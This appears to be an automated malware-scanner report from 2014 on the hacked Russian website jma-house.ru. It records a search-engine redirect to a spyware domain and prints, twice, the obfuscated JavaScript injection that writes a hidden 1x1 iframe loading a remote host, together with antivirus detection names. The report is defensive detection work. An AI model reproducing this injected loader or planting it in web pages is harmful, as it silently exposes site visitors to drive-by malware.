New scan:

Malware Scanner report for jma-house.ru

Malicious/Suspicious/Total urls checked
2/0/4
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://spyware-files.info/0/go.php?sid=2
39 websites infected.

The website "jma-house.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/2/2
2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://jma-house.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: jma-house.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Wed, 10 Sep 2014 21:21:24 GMT
Location: http://spyware-files.info/0/go.php?sid=2
Server: Apache
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://jma-house.ru/
200 OK
Content-Length: 6869
Content-Type: text/html
clean
http://jma-house.ru/templates/jma-house/Scripts/AC_RunActiveContent.js
200 OK
Content-Length: 8029
Content-Type: application/x-javascript
clean
http://jma-house.ru/../../Scripts/AC_RunActiveContent.js
400 Bad Request
Content-Length: 2862
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write(unescape("%3c%62%20%69%64%3d%22%62%39%37%30%22%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%22%3e%40%25%40%5e%36%5e%38%5e%40%25%40%5e%37%5e%34%5e%40%25%40%5e%37%5e%34%5e%40%25%40%5e%37%5e%30%5e%40%25%40%5e%33%5e%61%5e%40%25%40%5e%32%5e%66%5e%40%25%40%5e%32%5e%66%5e%40%25%40%5e%36%5e%39%5e%40%25%40%5e%36%5e%63%5e%40%25%40%5e%36%5e%63%5e%40%25%40%5e%37%5e%35%5e%40%25%40%5e%37%5e%33%5e%40%25%40%5e%36%5e%39%5e%40%25%40%5e%36%5e%66%5e%40%25%40%5e%36%5e%65%5e%40%25%40%
... 466 bytes are skipped ...
4%5e%40%25%40%5e%36%5e%64%5e%40%25%40%5e%36%5e%63%5e%3c%2f%62%3e%0a%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%75%6e%65%73%63%61%70%65%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%27%62%39%37%30%27%29%2e%69%6e%6e%65%72%48%54%4d%4c%2e%72%65%70%6c%61%63%65%28%2f%5b%5c%2b%21%2a%5e%23%40%24%5d%2f%67%2c%22%22%29%29%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b%3c%2f%73%63%72%69%70%74%3e"));

Decoded script:


<b id="b970" style="display:none;">@%@^6^8^@%@^7^4^@%@^7^4^@%@^7^0^@%@^3^a^@%@^2^f^@%@^2^f^@%@^6^9^@%@^6^c^@%@^6^c^@%@^7^5^@%@^7^3^@%@^6^9^@%@^6^f^@%@^6^e^@%@^6^6^@%@^6^5^@%@^7^3^@%@^7^4^@%@^2^e^@%@^7^2^@%@^7^5^@%@^2^f^@%@^6^3^@%@^6^f^@%@^7^0^@%@^6^5^@%@^7^2^@%@^6^6^@%@^6^9^@%@^6^c^@%@^6^4^@%@^2^e^@%@^6^8^@%@^7^4^@%@^6^d^@%@^6^c^</b>
document.write('<iframe src=\''+unescape(document.getElementById('b970').innerHTML.replace(/[\+!*^#@$]/g,""))+'\'></iframe>');

Antivirus reports:

Avast
HTML:Iframe-EX [Trj]

Hidden iFrame found.
size: 1x1     
src: http://glondis.cn/in.cgi?4

<iframe frameborder=0 border=0 height=1 width=1 src="http://glondis.cn/in.cgi?4" />

http://jma-house.ru/test404page.js
404 Not Found
Content-Length: 2806
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write(unescape("%3c%62%20%69%64%3d%22%62%39%37%30%22%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%22%3e%40%25%40%5e%36%5e%38%5e%40%25%40%5e%37%5e%34%5e%40%25%40%5e%37%5e%34%5e%40%25%40%5e%37%5e%30%5e%40%25%40%5e%33%5e%61%5e%40%25%40%5e%32%5e%66%5e%40%25%40%5e%32%5e%66%5e%40%25%40%5e%36%5e%39%5e%40%25%40%5e%36%5e%63%5e%40%25%40%5e%36%5e%63%5e%40%25%40%5e%37%5e%35%5e%40%25%40%5e%37%5e%33%5e%40%25%40%5e%36%5e%39%5e%40%25%40%5e%36%5e%66%5e%40%25%40%5e%36%5e%65%5e%40%25%40%
... 466 bytes are skipped ...
4%5e%40%25%40%5e%36%5e%64%5e%40%25%40%5e%36%5e%63%5e%3c%2f%62%3e%0a%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%75%6e%65%73%63%61%70%65%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%27%62%39%37%30%27%29%2e%69%6e%6e%65%72%48%54%4d%4c%2e%72%65%70%6c%61%63%65%28%2f%5b%5c%2b%21%2a%5e%23%40%24%5d%2f%67%2c%22%22%29%29%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b%3c%2f%73%63%72%69%70%74%3e"));

Decoded script:


<b id="b970" style="display:none;">@%@^6^8^@%@^7^4^@%@^7^4^@%@^7^0^@%@^3^a^@%@^2^f^@%@^2^f^@%@^6^9^@%@^6^c^@%@^6^c^@%@^7^5^@%@^7^3^@%@^6^9^@%@^6^f^@%@^6^e^@%@^6^6^@%@^6^5^@%@^7^3^@%@^7^4^@%@^2^e^@%@^7^2^@%@^7^5^@%@^2^f^@%@^6^3^@%@^6^f^@%@^7^0^@%@^6^5^@%@^7^2^@%@^6^6^@%@^6^9^@%@^6^c^@%@^6^4^@%@^2^e^@%@^6^8^@%@^7^4^@%@^6^d^@%@^6^c^</b>
document.write('<iframe src=\''+unescape(document.getElementById('b970').innerHTML.replace(/[\+!*^#@$]/g,""))+'\'></iframe>');

Antivirus reports:

Avast
HTML:Iframe-EX [Trj]

Hidden iFrame found.
size: 1x1     
src: http://glondis.cn/in.cgi?4

<iframe frameborder=0 border=0 height=1 width=1 src="http://glondis.cn/in.cgi?4" />

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jma-house.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jma-house.ru/

Result: jma-house.ru is not infected or malware details are not published yet.